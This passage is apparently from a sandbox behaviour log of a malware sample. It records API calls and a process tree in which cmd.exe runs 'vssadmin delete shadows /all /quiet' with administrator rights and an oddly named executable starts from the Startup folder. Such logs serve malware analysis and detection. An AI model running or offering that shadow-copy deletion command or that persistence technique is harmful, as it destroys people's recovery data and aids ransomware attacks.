	[0032.920] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309090, Size=0x6e) returned 0x309090
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309090) returned 0x6e
	[0032.920] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63
	[0032.920] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x128) returned 0x305b70
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x240) returned 0x2f1ab0
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x2f1ab0, Size=0x12a) returned 0x2f1ab0
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x2f1ab0) returned 0x12a
	[0032.920] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a51f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xe8) returned 0x309db0
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309db0, Size=0x7e) returned 0x309db0
	[0032.920] GetProcessHeap () returned 0x2f0000
	[0032.920] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309db0) returned 0x7e
	[0032.920] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0032.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0xffffffffffffffff
	[0032.920] GetLastError () returned 0x2
	[0032.920] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\vssadmin", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0xffffffffffffffff
	[0032.921] GetLastError () returned 0x2
	[0032.921] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3
	[0032.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.*", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0x309ba0
	[0032.921] FindClose (in: hFindFile=0x309ba0 | out: hFindFile=0x309ba0) returned 1
	[0032.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.COM", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0xffffffffffffffff
	[0032.921] GetLastError () returned 0x2
	[0032.921] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\vssadmin.EXE", fInfoLevelId=0x1, lpFindFileData=0x13e9f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x13e9f0) returned 0x309ba0
	[0032.921] FindClose (in: hFindFile=0x309ba0 | out: hFindFile=0x309ba0) returned 1
	[0032.921] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3
	[0032.921] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2
	[0032.921] GetConsoleTitleW (in: lpConsoleTitle=0x13ef40, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
	[0032.921] GetProcessHeap () returned 0x2f0000
	[0032.921] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x21c) returned 0x309110
	[0032.922] GetConsoleTitleW (in: lpConsoleTitle=0x309120, nSize=0x104 | out: lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe") returned 0x2a
	[0032.922] GetProcessHeap () returned 0x2f0000
	[0032.922] RtlReAllocateHeap (Heap=0x2f0000, Flags=0x0, Ptr=0x309110, Size=0xc0) returned 0x309110
	[0032.922] GetProcessHeap () returned 0x2f0000
	[0032.922] RtlSizeHeap (HeapHandle=0x2f0000, Flags=0x0, MemoryPointer=0x309110) returned 0xc0
	[0032.922] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\system32\\cmd.exe - vssadmin  delete shadows /all /quiet") returned 1
	[0032.923] GetProcessHeap () returned 0x2f0000
	[0032.923] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x309110 | out: hHeap=0x2f0000) returned 1
	[0032.923] InitializeProcThreadAttributeList (in: lpAttributeList=0x13ecf8, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x13ecb8 | out: lpAttributeList=0x13ecf8, lpSize=0x13ecb8) returned 1
	[0032.923] UpdateProcThreadAttribute (in: lpAttributeList=0x13ecf8, dwFlags=0x0, Attribute=0x60001, lpValue=0x13eca8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x13ecf8, lpPreviousValue=0x0) returned 1
	[0032.923] GetStartupInfoW (in: lpStartupInfo=0x13ee10 | out: lpStartupInfo=0x13ee10*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xec, hStdOutput=0xf8, hStdError=0xf8)) 
	[0032.923] GetProcessHeap () returned 0x2f0000
	[0032.923] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x20) returned 0x304640
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.923] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0032.924] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20
	[0032.924] GetProcessHeap () returned 0x2f0000
	[0032.924] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x304640 | out: hHeap=0x2f0000) returned 1
	[0032.924] GetProcessHeap () returned 0x2f0000
	[0032.924] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x12) returned 0x308900
	[0032.924] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\vssadmin.exe", lpCommandLine="vssadmin  delete shadows /all /quiet", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x13ed30*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="vssadmin  delete shadows /all /quiet", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x13ece0 | out: lpCommandLine="vssadmin  delete shadows /all /quiet", lpProcessInformation=0x13ece0*(hProcess=0x50, hThread=0x54, dwProcessId=0x9a4, dwThreadId=0x9a8)) returned 1
	[0032.931] CloseHandle (hObject=0x54) returned 1
	[0032.931] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1
	[0032.931] GetProcessHeap () returned 0x2f0000
	[0032.931] HeapFree (in: hHeap=0x2f0000, dwFlags=0x0, lpMem=0x30eb10 | out: hHeap=0x2f0000) returned 1
	[0032.931] GetEnvironmentStringsW () returned 0x30eb10*
	[0032.931] GetProcessHeap () returned 0x2f0000
	[0032.931] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xb0e) returned 0x30f630
	[0032.931] FreeEnvironmentStringsW (penv=0x30eb10) returned 1
	[0032.931] NtQueryInformationProcess (in: ProcessHandle=0x50, ProcessInformationClass=0x0, ProcessInformation=0x13e5e8, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x13e5e8, ReturnLength=0x0) returned 0x0
	[0032.931] ReadProcessMemory (in: hProcess=0x50, lpBaseAddress=0x7fffffd5000, lpBuffer=0x13e620, nSize=0x380, lpNumberOfBytesRead=0x13e5e0 | out: lpBuffer=0x13e620*, lpNumberOfBytesRead=0x13e5e0*=0x380) returned 1
	[0032.932] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) 

Process:
	id = "3"
	image_name = "mode.com"
	filename = "c:\\windows\\system32\\mode.com"
	page_root = "0x4e2ed000"
	os_pid = "0x974"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0x948"
	cmd_line = "mode  con cp select=1251"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 9
	os_tid = 0x978


Process:
	id = "4"
	image_name = "vssadmin.exe"
	filename = "c:\\windows\\system32\\vssadmin.exe"
	page_root = "0x4f716000"
	os_pid = "0x9a4"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "2"
	os_parent_pid = "0x948"
	cmd_line = "vssadmin  delete shadows /all /quiet"
	cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 20
	os_tid = 0x9a8


Thread:
	id = 21
	os_tid = 0x9b4


Thread:
	id = 23
	os_tid = 0xa38


Thread:
	id = 24
	os_tid = 0xa3c


Thread:
	id = 25
	os_tid = 0xa40


Process:
	id = "5"
	image_name = "vssvc.exe"
	filename = "c:\\windows\\system32\\vssvc.exe"
	page_root = "0x48a6e000"
	os_pid = "0xa48"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b7e890"
	monitor_reason = "rpc_server"
	parent_id = "4"
	os_parent_pid = "0x9a4"
	cmd_line = "C:\\Windows\\system32\\vssvc.exe"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\VSS" [0xe], "NT AUTHORITY\\Logon Session 00000000:0004f4d1" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 27
	os_tid = 0xa64


Thread:
	id = 28
	os_tid = 0xa60


Thread:
	id = 29
	os_tid = 0xa5c


Thread:
	id = 30
	os_tid = 0xa58

	[0042.686] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xd0d9c0 | out: lpSystemTimeAsFileTime=0xd0d9c0*(dwLowDateTime=0xf7db3f80, dwHighDateTime=0x1d58eed)) 
	[0042.686] GetCurrentProcessId () returned 0xa48
	[0042.686] GetCurrentThreadId () returned 0xa58
	[0042.686] GetTickCount () returned 0x114512d
	[0042.686] QueryPerformanceCounter (in: lpPerformanceCount=0xd0d9c8 | out: lpPerformanceCount=0xd0d9c8*=16260796342) returned 1
	[0042.686] malloc (_Size=0x100) returned 0x668e80

Thread:
	id = 31
	os_tid = 0xa54


Thread:
	id = 32
	os_tid = 0xa50


Thread:
	id = 33
	os_tid = 0xa4c


Thread:
	id = 34
	os_tid = 0xa7c


Thread:
	id = 41
	os_tid = 0xb20


Thread:
	id = 42
	os_tid = 0xbe4


Process:
	id = "6"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x44f73000"
	os_pid = "0xa68"
	os_integrity_level = "0x4000"
	os_privileges = "0x60814080"
	monitor_reason = "rpc_server"
	parent_id = "5"
	os_parent_pid = "0xa48"
	cmd_line = "C:\\Windows\\System32\\svchost.exe -k swprv"
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\swprv" [0xe], "NT AUTHORITY\\Logon Session 00000000:00050034" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 35
	os_tid = 0xa84


Thread:
	id = 36
	os_tid = 0xa80


Thread:
	id = 37
	os_tid = 0xa78


Thread:
	id = 38
	os_tid = 0xa74


Thread:
	id = 39
	os_tid = 0xa70


Thread:
	id = 40
	os_tid = 0xa6c


Thread:
	id = 43
	os_tid = 0xbe8


Process:
	id = "7"
	image_name = "gjfkyfli;.exe"
	filename = "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe"
	page_root = "0x79ceb000"
	os_pid = "0x5d8"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "autostart"
	parent_id = "0"
	os_parent_pid = "0x0"
	cmd_line = "\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" "
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "32"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ecd5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 45
	os_tid = 0x5dc

	[0123.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x2b6055c0, dwHighDateTime=0x1d58eee)) 
	[0123.687] GetCurrentThreadId () returned 0x5dc
	[0123.687] GetCurrentProcessId () returned 0x5d8
	[0123.687] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=6894812291) returned 1
	[0123.688] GetStartupInfoW (in: lpStartupInfo=0x18ff08 | out: lpStartupInfo=0x18ff08*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x775afd35, hStdError=0x77617daf)) 
	[0123.688] GetProcessHeap () returned 0x79b0000
	[0123.689] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77080000
	[0124.534] GetProcAddress (hModule=0x77080000, lpProcName=0x411d04) returned 0x77094f2b
	[0124.534] GetProcAddress (hModule=0x77080000, lpProcName="FlsFree") returned 0x7709359f
	[0124.534] GetProcAddress (hModule=0x77080000, lpProcName="FlsGetValue") returned 0x77091252
	[0124.534] GetProcAddress (hModule=0x77080000, lpProcName="FlsSetValue") returned 0x77094208
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="InitializeCriticalSectionEx") returned 0x77094d28
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CreateEventExW") returned 0x7711410b
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CreateSemaphoreExW") returned 0x77114195
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadStackGuarantee") returned 0x7709d31f
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolTimer") returned 0x770aee7e
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolTimer") returned 0x775d441c
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x775fc50e
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolTimer") returned 0x775fc381
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CreateThreadpoolWait") returned 0x770af088
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="SetThreadpoolWait") returned 0x775e05d7
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CloseThreadpoolWait") returned 0x775fca24
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="FlushProcessWriteBuffers") returned 0x775b0b8c
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x7766fde8
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentProcessorNumber") returned 0x77601e1d
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="GetLogicalProcessorInformation") returned 0x77114761
	[0124.535] GetProcAddress (hModule=0x77080000, lpProcName="CreateSymbolicLinkW") returned 0x7710cd11
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="SetDefaultDllDirectories") returned 0x0
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="EnumSystemLocalesEx") returned 0x7711424f
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="CompareStringEx") returned 0x771146b1
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetDateFormatEx") returned 0x77126676
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetLocaleInfoEx") returned 0x77114751
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetTimeFormatEx") returned 0x771265f1
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetUserDefaultLocaleName") returned 0x771147c1
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="IsValidLocaleName") returned 0x771147e1
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="LCMapStringEx") returned 0x771147f1
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetCurrentPackageId") returned 0x0
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetTickCount64") returned 0x770aeee0
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="GetFileInformationByHandleExW") returned 0x0
	[0124.536] GetProcAddress (hModule=0x77080000, lpProcName="SetFileInformationByHandleW") returned 0x0
	[0124.537] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x3bc) returned 0x79c1ee8
	[0124.537] GetCurrentThreadId () returned 0x5dc
	[0124.537] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x18) returned 0x79c07d0
	[0124.537] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x800) returned 0x79c22b0
	[0124.537] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x4054f2, hStdOutput=0xb043a714, hStdError=0x0)) 
	[0124.537] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0
	[0124.537] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0
	[0124.537] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0
	[0124.537] GetCommandLineW () returned="\"C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe\" "
	[0124.537] GetEnvironmentStringsW () returned 0x79c2ab8*
	[0124.538] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0xb02) returned 0x79c35c8
	[0125.320] FreeEnvironmentStringsW (penv=0x79c2ab8) returned 1
	[0125.329] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4396b0, nSize=0x104 | out: lpFilename="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\gjfkyfli;.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\gjfkyfli;.exe")) returned 0x4a
	[0125.329] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x0, Size=0x9e) returned 0x79c07f0
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x9c) returned 0x79c0898
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x3e) returned 0x79c2ab8
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x6c) returned 0x79c2b00
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x6e) returned 0x79c2b78
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x78) returned 0x79c2bf0
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x62) returned 0x79c2c70
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x2e) returned 0x79c2ce0
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x48) returned 0x79c2d18
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x28) returned 0x79c2d68
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x1a) returned 0x79c1840
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x4a) returned 0x79c2d98
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x72) returned 0x79c40f0
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x30) returned 0x79c2df0
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x2e) returned 0x79c2e28
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x1c) returned 0x79c1868
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0xd2) returned 0x79c2e60
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x7c) returned 0x79c2f40
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x36) returned 0x79c2fc8
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x3a) returned 0x79c3008
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x90) returned 0x79c3050
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x24) returned 0x79c30e8
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x30) returned 0x79c3118
	[0126.259] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x36) returned 0x79c3150
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x48) returned 0x79c3190
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x52) returned 0x79c31e0
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x3c) returned 0x79c3240
	[0126.260] RtlAllocateHeap (HeapHandle=0x79b0000, Flags=0x8, Size=0x82) returned 0x79c3288
